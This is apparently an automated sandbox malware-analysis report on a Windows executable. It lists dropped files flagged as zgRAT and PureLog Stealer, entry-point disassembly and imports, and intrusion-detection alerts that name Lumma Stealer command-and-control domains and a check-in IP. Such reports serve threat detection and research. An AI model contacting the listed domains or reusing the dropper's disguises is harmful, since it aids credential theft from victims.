Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\Speech\kdmapper.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2284739
Entropy (8bit):	7.490456730492454
Encrypted:	false
SSDEEP:	24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
MD5:	C85ABE0E8C3C4D4C5044AEF6422B8218
SHA1:	F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
SHA-256:	7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
SHA-512:	082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Windows\Speech\physmeme.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	370176
Entropy (8bit):	7.990824056166435
Encrypted:	true
SSDEEP:	6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
MD5:	D6EDF37D68DA356237AE14270B3C7A1A
SHA1:	37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
SHA-256:	D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
SHA-512:	01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..\|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j\|.M.........M.;..q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$\|(.gE.N...3.J..T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...

C:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.943742592537296
Encrypted:	false
SSDEEP:	48:6bprPtxM7Jt8Bs3FJsdcV4MKe27/cSy5vqBHOOulajfqXSfbNtm:yPwPc+Vx9M/q5vkocjRzNt
MD5:	75FB40821ACB3A4C7FE69625132E44AD
SHA1:	17A610446A81488819EEC1639EF9D2F9DF1E3AF5
SHA-256:	DE308997679FE4A7260C26A6B60EBA045B3C7C001BF0402082FFA8DB44D43932
SHA-512:	3C035068FE9DEE0B018B71EC0C8D6D25C79EA0A072E36E0DBCC5C5E631A457CC3921D4C572FB8871D2C509987FFC25AD09401B886E5E56C2587E6BE4C4B6F3DC
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	2.5600289361122233
Encrypted:	false
SSDEEP:	3:oWEMo6vvRya:oWEpKvD
MD5:	198AA7622D86723F12D39AA38A10C97F
SHA1:	B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
SHA-256:	88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
SHA-512:	8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
Malicious:	false
Preview:	012340..1..2..3..4.....

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.885185687834986
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX5cUz9MTUxvrMTCvrv:Vx993DEU+c62bw
MD5:	B04FA6D98A844BC309F65833664659D7
SHA1:	514F523A3D056551C02691D7BA6EC4032CB06887
SHA-256:	05A8B8C33FC9E4CC0398EACF29D846B1F0F70DA679AC6C775A0FBF39DEDB41DF
SHA-512:	85EA097358EE421C022DF3D56322A8E47AF6B9E1DF2A197FF421B935F42ECF0EFFF6C1826CD46FACC4B9B57374E20FEF6E2E3E37B42CBE0B76238F11FF892C89
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/09/2024 16:15:41..16:15:41, error: 0x800705B4.16:15:47, error: 0x800705B4.

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.723149882634922
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NCTSgL4t0B.exe
File size:	628'224 bytes
MD5:	76b682b895587819cc3293cc109d3eb1
SHA1:	80e12ef0083ea82fcd3976e520c8f5bee908b830
SHA256:	6129fb697b8d4658283864689c040b2cd65923233de7dc75f723e22b6eebc82e
SHA512:	98645f0baced271f25edd659fad2882f8e73ede2d4427ec16e0deb80b8a2e2a67c2e9bebad0f392ff657c0d14da1019f84fc4dc57e39f49904acbec5a0af0aa5
SSDEEP:	12288:pvBZGNqtyONdkGDFDHy0UxCj2AqeMQmHnktO6W7:lnNt7dkmy0uGKFHnktO5
TLSH:	B7D49D4573A58BA8D277617894BBA31BF733B848177186CB63D040682FE23D05EBB752
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:...[...[...[...#...[.......[.......[.......[.......[...#...[...[...Z.......[....k..[.......[..Rich.[..........PE..d....3.f...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14004b23c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F433BB [Wed Sep 25 16:00:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	33ad68eb40469004473e3e2f94db1647

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F750506C76Ch
dec eax
add esp, 28h
jmp 00007F750506C097h
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push ebp
push edi
inc ecx
push esi
dec eax
mov ebp, esp
dec eax
sub esp, 10h
xor eax, eax
xor ecx, ecx
cpuid
inc esp
mov eax, ecx
inc esp
mov edx, edx
inc ecx
xor edx, 49656E69h
inc ecx
xor eax, 6C65746Eh
inc esp
mov ecx, ebx
inc esp
mov esi, eax
xor ecx, ecx
mov eax, 00000001h
cpuid
inc ebp
or edx, eax
mov dword ptr [ebp-10h], eax
inc ecx
xor ecx, 756E6547h
mov dword ptr [ebp-0Ch], ebx
inc ebp
or edx, ecx
mov dword ptr [ebp-08h], ecx
mov edi, ecx
mov dword ptr [ebp-04h], edx
jne 00007F750506C27Dh
dec eax
or dword ptr [00030DEDh], FFFFFFFFh
and eax, 0FFF3FF0h
dec eax
mov dword ptr [00030DD5h], 00008000h
cmp eax, 000106C0h
je 00007F750506C24Ah
cmp eax, 00020660h
je 00007F750506C243h
cmp eax, 00020670h
je 00007F750506C23Ch
add eax, FFFCF9B0h
cmp eax, 20h
jnbe 00007F750506C246h
dec eax
mov ecx, 00010001h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
bt ecx, eax
jnc 00007F750506C236h
inc esp
mov eax, dword ptr [0004D26Fh]
inc ecx
or eax, 01h
inc esp
mov dword ptr [0004D264h], eax

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x79454	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9c000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x99000	0x2dfc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9d000	0x240	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x72e90	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x72f00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x72d50	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4e000	0x850	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4c3b7	0x4c400	007994516b8b64d37c353be2ff857c12	False	0.5010149846311476	data	6.498864326562007	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4e000	0x2d894	0x2da00	cf4718c34477eb02401f822752dcfa0c	False	0.7480040667808219	dBase III DBT, version number 0, next free block index 500742, 1st item "f\236\007"	6.924899756763114	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7c000	0x1cca8	0x1c000	f13a88c05fff82e9960b245db39e9c54	False	0.45473807198660715	data	5.382533114866348	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x99000	0x2dfc	0x2e00	dd958cd6dece03af5616525e3bc5e1e7	False	0.47121263586956524	data	5.745616690104214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x9c000	0x1e8	0x200	031246ef171793b1fc79b2206b5d8bcc	False	0.54296875	data	4.768131151703051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9d000	0x240	0x400	8db61ed6d2715dbd01063ff3f53d634b	False	0.3994140625	data	3.614719584000072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x9c060	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
d3d9.dll	Direct3DCreate9Ex
KERNEL32.dll	VirtualFree, GetCurrentProcess, OutputDebugStringA, DeviceIoControl, VirtualAlloc, Thread32Next, Thread32First, CreateFileW, GetCurrentThreadId, GetModuleHandleA, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, GetCurrentThread, LoadLibraryA, Process32Next, CloseHandle, K32GetModuleBaseNameA, CreateThread, HeapSetInformation, GetThreadContext, GetProcAddress, GetCurrentProcessId, GetProcessHeap, WideCharToMultiByte, lstrcmpiA, K32EnumProcessModules, GetTickCount, OpenThread, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, VirtualProtect, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, Process32First, QueryPerformanceCounter, QueryPerformanceFrequency, GlobalUnlock, GlobalLock, GlobalFree, GlobalAlloc, ReleaseSRWLockExclusive, UnhandledExceptionFilter
USER32.dll	EmptyClipboard, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, GetClientRect, SetCursor, ClientToScreen, GetActiveWindow, ScreenToClient, SetClipboardData, GetKeyState, SendInput, UpdateWindow, RegisterClassExA, FindWindowA, GetDesktopWindow, PeekMessageA, LoadIconA, mouse_event, TranslateMessage, SetLayeredWindowAttributes, CreateWindowExA, DefWindowProcA, GetForegroundWindow, GetClipboardData, LoadCursorA, MessageBoxA, SetWindowLongA, GetWindow, DispatchMessageA, GetAsyncKeyState, GetWindowRect, DestroyWindow, SetWindowPos, ShowWindow, GetSystemMetrics
ADVAPI32.dll	OpenProcessToken, GetTokenInformation
IMM32.dll	ImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
MSVCP140.dll	_Query_perf_frequency, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Query_perf_counter, _Thrd_detach, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ
ntdll.dll	RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
dwmapi.dll	DwmExtendFrameIntoClientArea
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	__std_terminate, _CxxThrowException, strstr, __C_specific_handler, __std_exception_destroy, memset, __std_exception_copy, memchr, __current_exception, __current_exception_context, memcmp, memmove, memcpy
api-ms-win-crt-stdio-l1-1-0.dll	__p__commode, _fseeki64, fsetpos, ungetc, _get_stream_buffer_pointers, setvbuf, fgetpos, fclose, __acrt_iob_func, __stdio_common_vsnprintf_s, fflush, fgetc, ftell, fputc, _set_fmode, fseek, __stdio_common_vsprintf_s, __stdio_common_vfprintf, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite
api-ms-win-crt-string-l1-1-0.dll	strncpy, isprint, strcmp, _stricmp
api-ms-win-crt-utility-l1-1-0.dll	qsort, rand
api-ms-win-crt-heap-l1-1-0.dll	_callnewh, _set_new_mode, malloc, free
api-ms-win-crt-convert-l1-1-0.dll	atof
api-ms-win-crt-runtime-l1-1-0.dll	system, _beginthreadex, terminate, abort, _invalid_parameter_noinfo_noreturn, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit
api-ms-win-crt-math-l1-1-0.dll	asin, floorf, fmodf, powf, sinf, sqrt, __setusermatherr, atan2, sqrtf, pow, tanf, atan2f, ceilf, cosf
api-ms-win-crt-filesystem-l1-1-0.dll	_lock_file, _unlock_file
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale, ___lc_codepage_func
SHELL32.dll	ShellExecuteW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T18:33:35.150866+0200	2056172	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)	1	192.168.2.7	51720	1.1.1.1	53	UDP
2024-09-30T18:33:35.223222+0200	2056054	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)	1	192.168.2.7	50403	1.1.1.1	53	UDP
2024-09-30T18:33:35.239060+0200	2056040	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)	1	192.168.2.7	60759	1.1.1.1	53	UDP
2024-09-30T18:33:35.254192+0200	2056056	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)	1	192.168.2.7	54636	1.1.1.1	53	UDP
2024-09-30T18:33:35.268714+0200	2056036	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)	1	192.168.2.7	65440	1.1.1.1	53	UDP
2024-09-30T18:33:35.282658+0200	2056058	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)	1	192.168.2.7	64024	1.1.1.1	53	UDP
2024-09-30T18:33:35.295906+0200	2056046	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)	1	192.168.2.7	58850	1.1.1.1	53	UDP
2024-09-30T18:33:35.312038+0200	2056042	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)	1	192.168.2.7	49694	1.1.1.1	53	UDP
2024-09-30T18:33:35.325816+0200	2056052	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)	1	192.168.2.7	51956	1.1.1.1	53	UDP
2024-09-30T18:33:37.618210+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49706	172.67.197.40	443	TCP
2024-09-30T18:33:37.618210+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49706	172.67.197.40	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:33:28.944283009 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:28.944339037 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:28.944399118 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:28.962954044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:28.962989092 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.459665060 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.459770918 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.467788935 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.467827082 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.468233109 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.471333027 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.511414051 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604137897 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604233027 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604283094 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604281902 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.604317904 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604357004 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.604363918 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604409933 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604444981 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.604451895 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604497910 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.604532957 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.604538918 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.608771086 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.608820915 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.608834028 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.608865023 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.608902931 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.695986032 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.696146011 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.696178913 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.696192026 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.696222067 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.696260929 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.696300983 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.696886063 CEST	443	49701	188.114.96.3	192.168.2.7
